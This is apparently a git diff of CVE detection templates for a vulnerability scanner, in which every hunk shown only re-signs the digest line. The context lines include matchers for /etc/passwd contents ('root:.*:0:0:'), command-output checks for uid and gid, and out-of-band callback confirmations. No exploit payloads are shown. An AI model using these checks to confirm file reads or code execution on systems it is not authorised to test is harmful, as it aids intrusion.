a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 0e7cd34023..d5b46be579 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -67,4 +67,4 @@ http: group: 1 regex: - '\?v=([0-9.]+)' -# digest: 4b0a00483046022100ff8c851c74b80d9406f46e884bd52022d64db4601ef5803198cc3be69b3aab1602210099243bd82990fc8f8299c10bf31f6090c6abd3cbcf416c953a436b4572c245a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a978d3da6416cf845fa6575bc8896b92b3c928fd8a294c951bc8ace16acef28022100ac39ac8f69ec7f14088bcab163285fa4d9284da85d980928639e63b8e28c252e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 59b7332699..00af5bacec 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b2efe0e2b8798d4ea6ed19ab366fd08035ba9c4a905dc24780917aef1054056022100cbb08eedd02bf4914132fae7e4dcd9cdea870b249faec7e52ba313fa00ea30bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054afd71335a935e4a0640ae74e7ce38ab1d914a82eac75e251aa9471bbd04ced022100bda3a09ea4eced7e494e91eb2be7defaf99d57859bd03f35cc1247bba2fc6ed2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 75449b86cc..d930b0f553 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220730404803aefaab9552a359a9109e306f61b6f746b25c25c309b98bb2769cc44022100afd816ccce19408b01fe5861f8ea76986010736a6cdc3ffba50658a7a50a73d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220758d2304b1d699405d3be2d83c3a77d7411cf3cc4eec7a372ee3af9d17db31a6022100bebbb9928d8866af5eee1c336dfc1742c20c210e58b3d8a01e2d77ecdb20a0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 22578c4557..700fcf5769 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022007073a870a4add30131c5c00b135d70d1a866ff94c73254c7be36d7f69035400022019d693623a03aab5928cdd7c484b47e720fd292ec84beaa923722af625bd5648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207123b88063bc8e2764d0cf58dc5194e4a6eae09aacc77f1099eddf1e76f77cf2022074d297a3fc44d70f2be3d0d571a0776957ad0a90d4eb104aa3f88238c832edbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 77a1e47e8d..ad13268299 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402202b0ef3bbb83d1e3a581627f23a46bc39a52ce5065a1b54900ecf212a4377804c0220543b800342938579c7f4f18a4bedd5ea77398f66a0171d9a40d3a1c25678e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038de0c0c8b6c31166991b40cb5c2552cfa30480ebe02939ee22118f85b9642740220084c3ccd76fe4098e05901a34cbd4a8bc5c8c22c066135a110ded75f17dbad47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 48dc6e03bb..1af5d51a6e 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402205aba00dc71a461ecf5a2b4d96f029ca13228c3b3bd06050a3c62de6a25f718b50220708eabd18c088a9d7051f3c65bda1a976658e97572d79df298e9a97b73fc899f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1eda3d9d9c54430c22c449556b1cef412dcc994ef02f327be711ef72d0316a1022050927d61d2e0591a3fdd2609fe475e6bb6cc90724037afc2eeb2e500bcf6a5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index e963305f7b..cfaeb96576 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -53,4 +53,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022010a0d4f590ec7df72f845b76afa10bba295cb790b5809a2e8f9ee10f2ce4e675022100ea18957ac1dfad6868cf21d0c21ef9ea8f03951dfc7dc71c1755160935f07d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c65b0731bfdc87a270065d149c3b699f09e5e20e70e31a24fe5fbe05b5a149fb02207bdc1cfd101ec33049d00e77bbb0b87c0c053e4a1807abfc5992c61f51b1962a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 5c7074430f..4029b91e8c 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -55,4 +55,4 @@ http: - status_code_3 == 200 - contains(body_1, "Citrix SD-WAN") condition: and -# digest: 4a0a00473045022028d757c9021cfe91970444757763cf2003785713ea9f3602bd768bd83be0f8c3022100c9296bbe6b5d59548f4e8fba22c9ef4b44984f446ca9b44fec7de62e4bc23bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df14dd7c2655786918e861da2f04951923b3dd43d59755ed8e90358bfbe41daf0220762adba19e4499f0eaac470404abf44548576795df891a230b0f3c37dc36f3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index fd706d268b..5c7db6f5fb 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6013aa930559e818c237f42a76be0a2dbdb05aa0aea9954127e7ffa9a3d33000220709875e5f3a3dbc0dea93d6fe4083ffd49bb89ec74a2bc1837766a7ffb3f07b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040244b26f38b4723a5f287f4e19182192fcb3046cd463b121034364d816363ba022100fb713221642e83baa1c7d5a9363ca18592ac5739a6d1297e4f3c4b6508f34200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 79bf241156..2836208101 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -50,4 +50,4 @@ http: part: header words: - text/html -# digest: 4a0a0047304502204a0083256266dd8d7becefcfe7e4bd8c0414418466724a347c0377239fa6dc0e022100c92ebd0d1d745b55423c3bb9239798cf2952282ecb31b43bd738138cab766bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a90e62949af80a7fe37e16afec3f89f92497c78838e9b766674b4b4f591c9c402210089a0c12120b8786cb3e8c8065707e83ffc7559e5b3de7f798d2c9d4a9f5529c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index bf8dc2a8a4..cdce943da1 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -60,4 +60,4 @@ http: - "idden' name='form_token' value='([a-z0-9]+)'>" internal: true part: body -# digest: 4a0a00473045022100f914e78ac71588395cde4bdd71fd9b68becbacd99efa10a46cd8fb336167e4990220063fa341232cdda62f8cf22c6e18aa7a5abd50cc86691eb6dec1c43bedf7749a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220474698615742c3b9befbda0e2bcb85bea35969f6c9f19e2bb2fd6a5cd02d2543022024e1f6e2bfaa043096ff492722e9f66622063a2d97e7fdff5b61c95c200bcd9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index bfc8baf9d8..3ca03dd2b2 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100ec3f40e7d064ff321d16b6306a478441e4bd2090824c5be828f1b87ec01b543a02204a4f41ae7e916c5758d5c246f77bef1c6eb34ce1b06f83db091b1604520f2006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070963915130aef214fb2d4fb838c4236cf7e30d11f2515b512f1fdf68339699c02210091125d7256d83a2947a0d88cd3820661299eefd42a962f28efbe63b1581e207e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index ca9333990a..c2d7721967 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220498b0deb6290b3abe149ebc78a6303bfbf6b759f3b533adeaa6c2073a0cc5a7a02210083cf5432b2eb0d6876b58392346245ec5b1ff2edf0709d4c034a568a77449c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ff21687a523a9cb6627dd187316d8522e091a926cb0b2c398a7caa3de9a0f04022100c172ad86c7e42b249dec39a2159c496e7394310ca80c377251c1e0dfaf088071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 841dd84ca3..f25070c99f 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -44,4 +44,4 @@ http: part: header regex: - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$" -# digest: 4a0a0047304502202d2baa5fcd7264d8391000860e52290c9775cbecac3157c944103a9f049c2a2b022100d869aca527760b3b4fc077408d5c8f83a2078ae647670da0a19bd08ee2e81056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d5f0ef95ddabc2bdbaa24ca65c591518b64e1c5a76acbdd6a4761dc87127fad022024f70af5b612de0111602d874662511ee3f43f639e34344c50ee4178e2f69f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 2220dd470f..d8ba966c27 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040c8eba803c77e52db54922bfde06450c0fb7cc3c0cc1032c3fe822599c9fffc0220233980a4f9b4b7e72fb0ef52d9a6e71da7999a0fa70e891aadb1836f35ac56c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b1a2b0df86f4fec836a803c9f979b0943ec0c3786627bc42d0f31fd7fc03bca02204c1aa89ad91c4c776e3708d673869c99f7312d707e3b67d7c6209ef4841a62d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 3859d0338b..ef47745414 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aab45aec7b5e9cde37325bcc63c6be994f606ab29a9c85364fa96f07dd3ca56e022072d7b6a72c706f3ab71b6391b1e398c13d229ec23acf42b1ca94e3e69df1c04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220211914185787cdf387be2c26e25c18b7706cd88637ba4411c897d8017a5c249e02210095bbedfb97962c663e883378ed5a7661bd11e8f802bf0cb70c7ea56e86c5bd7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 82691a077a..2ba58eff87 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220218490a21dc880778c576c05647488c68c62afe30f3cb08dee65084b629e9f3d022014789c5926f043dbbd6d7f2d04fced324050966e0a076a57bf587f4dd9297f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203873fcabe92d5432e4a3a367df497ad11b8075f2c1dfbe3b469969af9114744902205461a9fb6bf86145db766b0dd2935ff057620e015bcb51a43c836a4f4e6291b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index f73c464c93..75074e1d65 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220581dc7f9af0e6819134169343d3902a8c4ca36a9c1794b2bdc3da5fabbe6729002210093bc4a3b29b79ac4bcf1e1922164adf7f0e82eca386e7de5af62c4a228587ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4130fb1b77b9e6ee1a29b2c6d5479765ab5b0d271d62634e50ba19053b61e6a02207bd80e0f22b1dd469d044b7b50a9930d04015e00b7fc3cb45feed0620ae85673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index e8850b212d..90b9ea6ddc 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021c34366a64cbfdefebecb4aa4f7c353eea5fdc366066e809cb883b1b48eebfa022037201460a13c29307875ac704248267640de95a2ab5743fdca89234c2bde1126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f8c5af4ccb804ce6eba9057c9d69d997e1ed37ba31cab8162c1b0e3e447c7cc022039fd15233f3f3dea200778731385446974efe8c83efaf5a3113c8b9273a20094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 8fec196e82..6a212be265 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -87,4 +87,4 @@ http: regex: - '__CSRFToken__" value="(.*?)"' internal: true -# digest: 4a0a004730450221009eeb1aecb7f7ee802cfd019bdbb9f81f98886ef6692f3c8883999696d0f6b8e302201d37fff5e31a6f4d57613523ed67d21d2c9c7c50cbb556cfe44e0907928f1003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065e66061da2caa14a4e28a20337513d3ed25486793432ac88f25c11f0ecb26b2022100d8c5b725a5ad3584280960a822d372fb3a42dcb18bf179f67d8cd3af94f99995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 08e26250cf..6c726c3933 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Custom 404 Pro")' condition: and -# digest: 4a0a00473045022100f868cbc5ff74801e824e4721f229eb4edaebfaefdde075bae4c07c4d2123145202202a8a32c4eb6a0c0c1683beb54270a0af67a0d0aa825c5c2043739a93cb305c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcc2bda6a9772bf00724aef8ea1e14be069dcd1b5329641d80e3612067c1aeef022063ccdde02fc45ecdb2fccb786f860f06ef162fd3572c88d3af98b8706774fd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index faed20e703..20802e8eb1 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd8b9c31ee67de53e39882df442d6306fac9c898795ec467e416db1958f59c8d022034bc65db7f8f0e389da72f21bc1e04230739416df27a216080067c12d3a2953e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220668bac552ce913a0fc436cba7429eede12ac09c4483d4bbe26286cd5cf2ce1db022039b2d6bb669068335ec43954f445fee03dc63174c5e551ec0d3eb60fdbb90a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index a61ed1018a..b8c995b875 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202007e18fe9e807726b296064b6494160674540c87127f0abc0c29d1e9e025ca3022100c3fe4dcd8deed1b86bb966d12f312fdd3bb2ba80b85bd4e969bf1b862e1f5831:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100996dd475afbc8c17aea67c45fd219b94df101afcc7d01ded4b32def1b0639c560220565ec0f9cf6406cb6b878bb65de77bdc3df473eefb82c9b6d454031a2c31319f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 7efed427ef..1b215d8af5 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -49,4 +49,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100bc6b699cacda5151710f068e0e6fa7b0b390af53662a040f5fd741c43d603435022100c3192cb0efda585b53107d73f33c98e74289457e1ce6a71b8602699d1c95fcee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205262fd7d7a96f260dcaf0113cefe14978152efed9c7d326392c8131035bbc09e02210092cba10d9687becaaed51cc881efd901e13b0f4b615ce3f7ddb49862c222764f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index ccd1096340..1bb0a0cf6b 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018ab4dd37c194955c9cc42951fa54fdb7b8effe30fc756d12a64d7a3ea1b9f77022100aaaee8c74c323286576af892c10a4c9abe2198d4b5e27a8114266c66dfb52357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c4c4762c45efd107e3dc19e37b553089ee3c5ac4bed1ac8dc49218b1e01f26a022043a5c7cd2ec8f5ac2ecfefd526816b8d6a0ae8dd038d7b8b2e56910c36ec6760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 925da743ae..2dcb929082 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -83,4 +83,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203340b3245dd51d9b67c6f29e2eb95aa3da0875247e28110b582812e96814346302200db80c14d3d510ec344719ffefd2e392bb9316a3d49a3d4e3aae41b95b77c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9988b212c5ff3a4d1b56f624dba6eb8bc04332263598e77107cd4549e02fb43022062a1278076d1dd9bef5a95eaebc2def66b8b6f960460ca7e4efe13e13cd5e377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 1acb34a7ea..bbcbbd5be7 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220174ad13726040e1c031af42e1fa3053557a40c426c3d8775b0bce9ecd161b97002210099a5611cf0e09613e1657be5cd27fcdb6f9d9fc16484b701e2dc4f315cc04a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220275a5af7802c048a229a91d71441896cd434087781be8487907c3338fccb0b7a02207f404a3a3e7366d8386d69d7566de69f572fc9af15159ecc60b01c1ab14a7c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 144637db9b..95c326a79d 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "post galleries!")' condition: and -# digest: 490a0046304402205217fa5d440959f2c80a587abe7bebae86cb1964d9c81277de7f8ce83833bfee02202d3d0b408e755ad0ecb80c3a9827a8c06a6c187d00b50e6c01451d50ac04f735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056a16f056cc58fb006a459c9168517f925edb27a7006189b7da06f91c0dd5be5022062657c2a2ac0ce3b00eb44b4a35b8337040849120130fdbb561263e4e36f81cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index fa7f1d7ba5..bdeca80bc0 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100960552edd3946d0a878780c7ec753f698b38790378a00d001ad8e698e433b615022100ef13927f3380602ec2ba9ad84ae009738ee47b6ac76599185f408be90af0bd98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd07f345ee9ee0404866dd839e20885d81d97b4d14a5a52ddd02d9c40b34d91d022100fded75594eebc1f4fde50dffe2d85704005119e1208884d4bf320b0739ffd219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 5717c86fcc..1e6139120e 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f89477db069d52a4cc684cd168c42ec2ffa472071204b0269ed495e2537f8fa3022100b6a151e5dada6a57a48310f599b3b354ff665e240d2bb1db1ef17038fc93dc17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f9e53b5bbe186eead22c5d94047633edadc37b403e5d466f3bb3dd0ac785c28022100b701684e93c0dd5845c17d0cf39e7f2083164299bc4f8cba427b4e77a63f0dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 6451b4d66f..3a947e6bf5 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -44,4 +44,4 @@ http: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and -# digest: 4a0a0047304502201d92a0801c2f43788aed32ed75ef458b62aca7e252963f4eb1fcc936afa07554022100df7afc1ba5725bcfdeb382cf89b08067d8bd2758da7a241b7e2de0eb9c038da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220280b2ea7e5f9a130af05a4cb347a3f11feac0e1a828778b316120ca09497b35202203c6b90c15e13f7644e7378a3f6c190122d02e561e6c633da4d7806ad48cc6593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 481ab5c4b8..54bd7d203a 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -55,4 +55,4 @@ http: - 201 - 409 condition: or -# digest: 4b0a00483046022100918f5cd75dc4ca87573ef7bda7b98585ca4b22397253f2259df83d4d89086569022100fe7217e13fc2ec1c9cf8e4cf1e9dcf8c2162197bb6c0768b3aa91cbbb3e87234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032df3d6d70691f08d27ca8999aae73a3455a4e1e09b4d94acb631f95fdd1803402201b0257ba21bc3b329e02836db3955782171cff35a3998fe795a0ec1b9ec023c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 03c8285e4f..92b7dab17b 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -43,4 +43,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100a638261fa16395169184c7769f4da8a8e957bb6a7ecbb48e08835e7d0fbb3e75022100cfb55688ecaa9d95404cb8d17c2d291274a6466a9b65cea745641e4325c2bbfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202380b19c009ef3cdcd0156d621203e553917d5ba91109cdf1694e2d725a82910022037ba291c44635675550212ffea435638f2b503ca360a6f4520960596ebccec48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index aeaded7539..13a039637e 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201ca94f30ff7dbb4635b2f005767ba3eaa9489c54f2ad57c33e2f23df55c1d0b6022100d0ac6506529e1e6fe832db0634f3a6ca0f8c77d16d959597a3421de3c2f04aaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018d2b67e1e0a3333f6012130917e6fd4937e0e93b8a27ffcfc00046b55f2dc0a0220719240472fa14c7ae17e758f8c76fc1a383e0122e3580e59325b801b71ccfad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 8951eeb3ae..60a837b639 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100883f7b6ac0eb6f91c28a201beec90c216df8296a09b56e6328378d54c8f68fab02203ecee5b5f73181d431655410ee02832559b60896d22aab17e1e22edb711db782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2d0674ffdf3a85fa6d9c2960f5251b04b031381c90421ae56931ca149644c0c0221009225bd042aa3c5adb3b06f0216881c17de04318d669e6cd2895fbcfa7806eb9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index a17f36a226..c433649c88 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008be1f9513f4cd8ba8c443769f746d53aac14d4c77b04f72e18394110f605f920022100bf37afa5281e8415049ecc8a0ee4031dd17d865dc828e2935c7911b2d5180c02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220108b02b3a681fbbee93437bf8d74b1eae57cf93529b9422dca41139bf25c6a0302204917a36515a81b0fbde8658f625dbc4c0dcaa1f8bf14d8a684f6f39e0813e7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 83eb26ec1c..1c28ea68c4 100644 --- 